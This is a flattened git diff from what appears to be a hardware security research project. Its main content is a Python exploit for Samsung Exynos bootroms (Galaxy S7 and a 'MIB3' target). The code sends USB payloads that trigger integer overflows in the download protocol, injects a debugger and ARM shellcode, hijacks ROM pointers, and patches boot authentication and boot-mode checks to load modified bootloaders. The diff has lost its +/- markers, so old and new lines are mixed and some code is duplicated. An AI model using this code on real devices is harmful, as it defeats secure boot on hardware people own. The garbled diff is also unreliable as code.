# bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger
# # Write bl31 at 0x02021800 and authenticate
auth_bl1(0x020c0000)
# Jump to bl31
jump_bl1(0x02021800)
pass
# VERY OLD
#000125b4
# self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
# self.cd.restore_stack_and_jump(0x00012814)
# self.cd.restore_stack_and_jump(0x000125b4)
def disable_mmu(self, address=0x02060000):
# ================= WORKS TO DISABLE DEBUGGER. BUT UNNECESSARY =================
# Disable MMU and branch to 0x02048000
@ -577,13 +376,13 @@ class S7Exploit(ExynosDevice):
bl31 = open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read()
bl2 = open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read()
bl33 = open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read()
if args.MIB3:
if args.target == "MIB3":
bl1 = open("../mib3/boot_partitions/fwbl1_a.bin", "rb").read()
bl1 = open("../mib3/modified_boot/fwbl1_mod.bin", "rb").read()
bl31 = open("../mib3/boot_partitions/el3_mon_a.bin", "rb").read()
bl2 = open("../mib3/boot_partitions/bl2_a.bin", "rb").read()
bl33 = open("../mib3/boot_partitions/u-boot_a.bin", "rb").read()
#bl33 = open("../mib3/modified_boot/u-boot_mod.bin", "rb").read()
bl33 = open("../mib3/modified_boot/u-boot_mod.bin", "rb").read()
# Test debugger connection
self.cd.test_connection()
@ -627,7 +426,7 @@ class S7Exploit(ExynosDevice):
self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # hijack ROM_DOWNLOAD_USB for BL31
BL1_POINTER = 0x02021880
if args.MIB3:
if args.target == "MIB3":
BL1_POINTER = 0x02021890
self.cd.memwrite_region(BL1_POINTER, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR, branch_ins="br"))
@ -680,7 +479,7 @@ class S7Exploit(ExynosDevice):
# Modifies/disables setting up MMU (but is set up eventually) -> MMU says 0x0 instead of 0x1, but still little access (and proper USB recovyer boot!?)
MMU_CHECK = 0x0202a314
if not args.MIB3:
if not args.target == "MIB3":
MMU_CHECK = 0x020244e8
self.cd.memwrite_region(MMU_CHECK, struct.pack('>I', 0x1f0c00f1)) # Change check to always be false
@ -689,7 +488,7 @@ class S7Exploit(ExynosDevice):
# Jump into BL31 and execute it
BL31_POINTER = 0x02024010
if args.MIB3:
if args.target == "MIB3":
BL31_POINTER = 0x0202a010
self.cd.restore_stack_and_jump(BL31_POINTER) #BL31_RA_PTR
else:
@ -708,12 +507,13 @@ class S7Exploit(ExynosDevice):
self.test_write_execute(0x11207010)
#if args.MIB3:
#if args.target == "MIB3":
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
if args.MIB3:
if args.target == "MIB3":
self.cd.memwrite_region(0x020553e4, b"\x1f\x50\x00\x71")
self.cd.memwrite_region(0x020553f8, b"\x1f\x50\x00\x71")
#self.cd.memwrite_region(0x02037108, b'\x40\x40\x40\x40')
self.cd.restore_stack_and_jump(hijacked_fun) # Jumps to function that waits for next boot stage
@ -724,6 +524,12 @@ class S7Exploit(ExynosDevice):
self.usb_read(0x200) # GiAs
self.print_registry_status()
if args.target == "MIB3":
print(f'Boot flag at 0x136d0184: {self.cd.memdump_region(0x136d0184, 0x4).hex()}')
print(f'Boot flag at 0x206f82c: {self.cd.memdump_region(0x206f82c, 0x4).hex()}')
print(f'Recovery boot flag: {self.cd.memdump_region(0x206f870, 0x4).hex()}')
#self.cd.memwrite_region(0x206f82c, b'') # to restore the oginal boot flow, without getting back to the debugger
# Restore bootflow
print(self.cd.arch_dbg.state.print_ctx()) # X29 here determines where the 'authentication' is taking place
@ -742,12 +548,19 @@ class S7Exploit(ExynosDevice):
# Add 00 to the end of bl33
#bl33 += b"\x00"
# Deconstruct every 4 bytes in bl33, and if it is a branch link to 0xcf0172dc, then try to modify it to be a proper branch link to 0xcf05dd6c
# Initialize Capstone disassembler for ARM64
self.send_normal_stage(bl33) # Never return/completes
self.connect_device()
self.usb_read(0x200)
debugger = open("../../dump/reloc_debugger_0xce050000.bin", "rb").read()
self.relocate_debugger(debugger=debugger, entry=0xce050000, storage=0xce053000, g_data_received=0xce054000)
DEBUGGER_ADDR = 0xce050000
# Change bootmode on S7 to SDCARD (allow normal booting, if pressing volume up)
if not args.MIB3:
if not args.target == "MIB3":
self.cd.memwrite_region(0x8f01dbdc, struct.pack('>I', 0x03030035))
self.cd.memwrite_region(0x8f01dbe0, struct.pack('>I', 0x80f9ff34))
@ -758,16 +571,27 @@ class S7Exploit(ExynosDevice):
# Jump into a different function that continues the boot flow (different than BL33_LR)
BL33_AUTH = 0x02024e5c
if args.MIB3:
if args.target == "MIB3":
self.cd.memwrite_region(0xcf08aa59, b"\x4c\x44\x46\x58") #58 was 57 in INIT print
self.cd.memwrite_region(0xcf026b94, struct.pack('>I', 0x210000b4)) # Change bootmode to GPT
BL33_AUTH = 0x202ae18 # BL33_LR
# Don't write recovery mode status
#self.cd.memwrite_region(0xcf05e2c0, b"\x50\xc7\xbf\x97")
# Modify get_boot_info to always return 0 (not recovery)
#self.cd.memwrite_region(0xcf053e24, struct.pack('>I', 0x00008252))
# Modify branch link at smc call to go to debugger
#self.cd.memwrite_region(0xcf05df9c, struct.pack('>I', 0x000da1f0))
#self.cd.memwrite_region(0xcf05dfa4, struct.pack('>I', 0x1f2003d5))
#self.cd.memwrite_region(0xcf05dff8, struct.pack('>I', 0x60af8092)) # modify smc call
# Modifying return values to continue boot flow
#self.cd.memwrite_region(0xcf05dea8, b"\xa0\x1f\x42\xf8")
# Print boot info from cf4dfb28
print(self.cd.memdump_region(0xcf4dfb28, 0x32))
# Start boot from BL33
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
@ -776,10 +600,29 @@ class S7Exploit(ExynosDevice):
time.sleep(1)
self.usb_read(0x200)
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
print(f'Boot flag at 0x136d0184: {self.cd.memdump_region(0x136d0184, 0x4).hex()}')
print(f'Boot flag at 0x206f82c: {self.cd.memdump_region(0x206f82c, 0x4).hex()}')
print(f'Boot flags at 0x206f800: {self.cd.memdump_region(0x206f800, 0x90).hex()}')
print(f'Boot flags at 0xcf4dfb28: {self.cd.memdump_region(0xcf4dfb28, 0x32).hex()}')
self.cd.arch_dbg.state.X0 = 0x0
self.cd.restore_stack_and_jump(0xcf05dd00)
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
self.cd.restore_stack_and_jump(BL33_AUTH)
# Boot flags at 0xcf4dfb28
#print(self.cd.memdump_region(0xcf4dfb28, 0x32).hex())
#self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
#self.cd.arch_dbg.state.X0 = 0x0
#self.cd.restore_stack_and_jump(0xcf05dd00)
#self.connect_device()
#self.usb_read(0x200)
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
self.cd.arch_dbg.state.X3 = 0x0
self.cd.arch_dbg.state.X2 = 0x0
self.cd.arch_dbg.state.X1 = 0x0
self.cd.arch_dbg.state.X0 = 0xffffffffffffff06
self.cd.restore_stack_and_jump(0xcf0538e4)
time.sleep(1)
self.connect_device()
self.usb_read(0x200)
@ -789,10 +632,6 @@ class S7Exploit(ExynosDevice):
# Try to continue the bootflow
self.cd.restore_stack_and_jump(0xcf0052f8)
# NOT WORKING
self.read_ufs(DEBUGGER_ADDR)
pass
@ -813,25 +652,28 @@ class S7Exploit(ExynosDevice):
self.cd.arch_dbg.state.X0 = curr_X0
self.cd.arch_dbg.state.X1 = curr_X1
return
def read_ufs(self, DEBUGGER_ADDR):
def replace_functions(binary, fun_to_replace=0xcf047474, replacing_fun=0xcf0172dc, base=0xcf000000):
"""
Read UFS
Argument structure is: param1, param2[]. With param2 being the cmd list
param1 = offset
Initially written to replace any print function that did not print to UART to then print to UART (worked surprisingly, but did not print a lot of extra info.. (boot path)).
"""
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
ufs_read_addr = 0xcf00eaf4
self.cd.arch_dbg.state.X0 = 0x0
self.cd.arch_dbg.state.X1 = 0x1
self.cd.restore_stack_and_jump(ufs_read_addr)
for i in tqdm.tqdm(range(0, len(binary), 4)):
fourbytes = binary[i:i+4]
time.sleep(1)
self.connect_device()
pass
for insn in cs.disasm(fourbytes, i):
if insn.mnemonic == "bl":
try:
target_address = int(insn.op_str.strip('#'), 16) + base
except ValueError:
continue
if target_address == fun_to_replace:
print(f"Found bl to 0xcf02b54c at {hex(i)}. Modifying..")
new_target_address = replacing_fun
new_offset = new_target_address
new_bl_instruction = struct.pack('<I', new_offset) # Pack as a 32-bit value
binary = binary[:i] + new_bl_instruction + binary[i+4:]
if __name__ == "__main__":
@ -840,11 +682,14 @@ if __name__ == "__main__":
arg.add_argument("--unsecure-boot", action="store_true", help="Unsecure boot", default=False)
arg.add_argument("--debugger-boot", action="store_true", help="Unsecure boot", default=False)
arg.add_argument("--load_ga", action="store_true", help="Load Gupje debugger", default=False)
arg.add_argument("--MIB3", action="store_true", help="Whether boot is on a MIB3", default=False)
arg.add_argument("--target", type=str, help="Target device", default="s7", choices=["S7", "MIB3"])
args = arg.parse_args()
exynos = S7Exploit()
# Load json configs from config folder
# config = open(f"config/{args.target}.json", "r").read()
if args.debug:
shellcode = open("../dwc3_test/dwc3.bin", "rb").read()
exynos.exploit(shellcode)

View File

@ -7,6 +7,9 @@ from ghidra_assistant.utils.debugger.debugger_archs.ga_arm64 import GA_arm64_deb
from qiling.const import QL_ARCH
import os, tqdm, datetime
ENDPOINT_BULK_IN = 0x81
ENDPOINT_BULK_OUT = 0x2
def p32(x):
return struct.pack("<I", x)
@ -31,6 +34,7 @@ class ExynosDevice():
self.target = "8890" # TODO auto detect device
self.connect_device()
def connect_device(self):
"""Setup proper connection, and ensure the connection is alive"""
self.context = usb1.USBContext()
@ -58,12 +62,14 @@ class ExynosDevice():
self.handle.claimInterface(0)
print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
def disconnect(self):
"""Disconnect the device"""
self.handle.releaseInterface(0)
self.handle.close()
self.context.exit()
def write(self, data):
"""Write data to the device"""
transferred = ctypes.c_int()
@ -71,6 +77,7 @@ class ExynosDevice():
assert(res == 0), "Could not perform bulk transfer"
return res
def usb_write(self, data):
assert len(data) <= 0x200, "Data too big"
transferred = ctypes.c_int()
@ -79,7 +86,7 @@ class ExynosDevice():
assert res == 0, f"Error sending data {res}"
assert transferred.value == len(data), f"Invalid transfered size {transferred.value} != {len(data)}"
return transferred.value
def usb_read(self, size):
transferred = ctypes.c_int()

View File

@ -0,0 +1,231 @@
import sys, libusb1, ctypes, struct
BLOCK_SIZE = 512
CHUNK_SIZE = 0xfffe00
MAX_PAYLOAD_SIZE = (BLOCK_SIZE - 10) # 512, - 10 for ready (4), size (4), footer (2)
DL_BUFFER_START = 0x02021800
DL_BUFFER_SIZE = 0x4E800 #max allowed/usable size within the buffer, with end at 0x02070000
BOOTROM_START = 0x0
BOOTROM_SIZE = 0x20000 #128Kb
TARGET_OFFSETS = {
# XFER_BUFFER, RA_PTR, XFER_END_SIZE
"8890": (0x02021800, 0x02020F08, 0x02070000), #0x206ffff on exynos 8890
"8895": (0x02021800, 0x02020F18, 0x02070000)
}
ENDPOINT_BULK_IN = 0x81
ENDPOINT_BULK_OUT = 0x2
def p32(x):
return struct.pack("<I", x)
def p8(x):
return struct.pack("<B", x)
def p16(x):
return struct.pack("<H", x)
def p64(x):
return struct.pack("<Q", x)
def test_bug_2(self):
"""Interger overflow in last packet if reamining size is 1."""
transferred = ctypes.c_int()
bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0
payload = b"\xaa" * 0x200
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
assert res == 0
payload = b"\xaa" * 0x200
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
while True:
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
def test_bug(self):
"""Verify bug existence"""
# Start by sending a valid packet
# Integer overflow in the size field
# unk + size + payload + header
payload = p32(0) + p32(0xFDFDE7FF + 0x1000) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
assert (len(payload) == BLOCK_SIZE)
res = self.write(payload, MAX_PAYLOAD_SIZE)
for i in range(200):
print(hex(self.send_empty_transfer()))
print('Bug probably available')
sys.exit(0)
def dumb_interact(self, dump_imems=False):
'''
Room for playing around with the debugger on the phone.
'''
self.cd.arch_dbg.state.auto_sync = False
self.cd.arch_dbg.state.auto_sync_special = False
print('State after setting up initial debugger')
self.cd.arch_dbg.state.print_ctx()
def first_debugger():
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
self.cd.memwrite_region(0x2069000, debugger)
self.cd.restore_stack_and_jump(0x2069000)
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
self.cd.relocate_debugger(0x206d000 + 0x1000, 0x2069000, 0x206d000)
# self.relocate_debugger()
DEBUGGER_ADDR = 0x2069000 #0x020c0000
### Get whereabouts of the debugger and current processor state
print('State after relocating debugger')
self.cd.arch_dbg.state.print_ctx()
def memdump_imem():
"""
Dumps the internal memory of the device (0x2020000 - 0x2070000).
"""
dumped = b""
for block in range(0x2020000, 0x2070000, 0x200):
# print(hex(block))
dumped += self.cd.memdump_region(block, 0x200)
return dumped
AUTH_BL1 = 0x00012848 # Location of the authentication function
def auth_bl1(lr=0x2069000):
# Load the firmware
self.cd.arch_dbg.state.X0 = 1
self.cd.arch_dbg.state.X1 = 1
self.cd.arch_dbg.state.LR = lr #jump back to debugger when finished
self.cd.restore_stack_and_jump(AUTH_BL1)
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
BOOT_BL1 = 0x00019310 # Location of the boot function
def boot_bl1(lr=0x2069000):
self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(BOOT_BL1)
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
JUMP_BL1 = 0x000002c0 # Location of the function to start the BL1 boot
def jump_bl1(lr):
self.cd.arch_dbg.state.LR = lr
self.cd.restore_stack_and_jump(JUMP_BL1)
# Always hijack rom_usb_download function:
rom_usb_download = self.cd.memdump_region(0x020200dc, 4)
self.cd.memwrite_region(0x020200dc, p32(0x2069000))
# Try loading bl1
bl1 = open("../S7/bl1.bin", "rb").read()
self.cd.memwrite_region(0x02021800, bl1)
self.usb_write(b"FLSH") # Flush cache, as Frederic does
self.cd.test_connection()
auth_bl1(DEBUGGER_ADDR)
# boot_bl1(DEBUGGER_ADDR)
self.cd.memwrite_region(0x02022858, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR)) # jump to debugger on next stage download
self.cd.memwrite_region(0x020219cc, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))
jump_bl1(DEBUGGER_ADDR)
# Returns on usb_download function
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
self.cd.arch_dbg.state.print_ctx()
dl_ready, next_stage = struct.unpack("<II", self.cd.memdump_region(0x02021518, 8))
bl31 = open("../S7/bl31.bin", "rb").read()
self.cd.memwrite_region(0x02024000, bl31)
self.cd.memwrite_region(0x02021518, p32(1)) # Set dl_ready to 1
self.cd.memwrite_region(0x02021518 + 4 , p32(self.cd.arch_dbg.state.X0))
self.cd.arch_dbg.state.X0 = 0
self.cd.restore_stack_and_jump(0x020219c8)
pass
# assert len(bl31) % 0x200 == 0, "Size needs to be 512 bytes aligned"
# self.cd.memwrite_region(self.cd.arch_dbg.state.X0, p32(147456)) # Update amount of blocks
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
# self.cd.restore_stack_and_jump(0x02022a08)
# Patches
# self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
# self.cd.memwrite_region(0x2022948 + 4, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))
# Patch stupid error function
# self.usb_write(b"FLSH") # Flush cache
# Download next stage?
lr = self.cd.arch_dbg.state.LR
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
pass
# Overwrite jump back to the debugger from functions encountered during jump_bl1
self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
self.cd.memwrite_region(0x020200dc, p32(0x020c0000))
def hijack_brom_weird():
print(f"From = {hex(self.cd.arch_dbg.state.LR - 4)} X0 = {hex(self.cd.arch_dbg.state.X0)}")
self.cd.restore_stack_and_jump(0x00000314)
jump_bl1(0x020c0000)
def handle_weird_brom():
while True:
try:
resp = self.usb_read(0x200)
logging.debug(f'Within jump_bl1. Response: {resp}.')
if self.cd.arch_dbg.state.LR == 0x02022948:
break # ROM will load next stage over USB
hijack_brom_weird()
except Exception as e:
pass
handle_weird_brom()
### For getting special registers. Non-writeable registers are detected. (UXN, PXN, etc)
# self.cd.jump_to(0x2069000)
# assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
# self.cd.fetch_special_regs()
self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)
self.cd.arch_dbg.state.X0 = 1
self.cd.restore_stack_and_jump(self.cd.arch_dbg.state.LR)
self.usb_read(0x200) # GiAs
self.cd.arch_dbg.state.LR = 0x2069000
self.cd.restore_stack_and_jump(0x00000314)
pass
### UXN and PXN seem to be present over the USB stack (02021800+)
shellcode = f"""
ldr x0, debugger_addr
blr x0
debugger_addr: .quad 0x02022000
"""
shellcode = ks.asm(shellcode, as_bytes=True)[0]
self.cd.memwrite_region(0x2021800, shellcode)
self.cd.jump_to(0x2021800)
pass
# bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger
# # Write bl31 at 0x02021800 and authenticate
auth_bl1(0x020c0000)
# Jump to bl31
jump_bl1(0x02021800)
pass
# VERY OLD
#000125b4
# self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
# self.cd.restore_stack_and_jump(0x00012814)
# self.cd.restore_stack_and_jump(0x000125b4)

View File

@ -0,0 +1,20 @@
sphinx
sphinx-autobuild
sphinx-rtd-theme
sphinxcontrib.confluencebuilder
sphinxcontrib.drawio
myst_parser
libusb1
pyusb
ghidra_bridge
tqdm
pyhidra
sphinxcontrib.confluencebuilder
sphinxcontrib.drawio
sphinx_wagtail_theme
plotly
numpy
nbformat==5.10.4
pandas
xvfbwrapper #Required for sphinx drawio
+source/ghidra_assistant/ghidra_assistant-0.0.1-py3-none-any.whl